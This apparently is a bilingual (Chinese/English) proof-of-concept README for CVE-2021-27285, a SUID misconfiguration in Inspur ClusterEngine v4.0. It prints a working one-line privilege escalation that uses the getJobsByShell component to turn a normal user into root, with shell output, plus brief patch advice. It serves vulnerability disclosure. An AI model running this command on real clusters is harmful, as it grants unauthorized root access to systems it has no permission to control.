# CVE-2021-27285
浪潮ClusterEngine集群管理平台是专为浪潮天梭系列HPC产品定制的一款作业管理软件。浪潮ClusterEngine存在suid配置不当的问题,导致非管理员用户可以通过部分组件进行提权获得root权限。
浪潮clusterenginev4.0存在[组件](getJobsByShell)“/opt/tsce4/torque6/bin/getJobsByShell”suid配置不当问题,非管理员用户能通过suid提权方式获得root权限。
提权过程如下:
```bash
$ whoami
user1
$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
# whoami
root
#
```
修复建议:
升级相关组件
The Inspur ClusterEngine cluster management platform is a job management software specifically designed for Inspur TianSuo series HPC products. A misconfiguration in the SUID settings of Inspur ClusterEngine allows non-administrative users to escalate privileges and obtain root access through certain components.
Inspur ClusterEngine v4.0 has an improper SUID configuration issue with the [component](getJobsByShell) "/opt/tsce4/torque6/bin/getJobsByShell", allowing non-administrative users to escalate privileges and gain root access via the SUID mechanism.
The privilege escalation process is as follows:
```bash
$ whoami
user1
$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
# whoami
root
#
```
advisory:
patch the relevant components.
[4.0K] /data/pocs/b7cc6625bd5a4ab4ae7cde3bce32ae5f654af028
├── [8.5K] getJobsByShell
└── [1.3K] README.md
0 directories, 2 files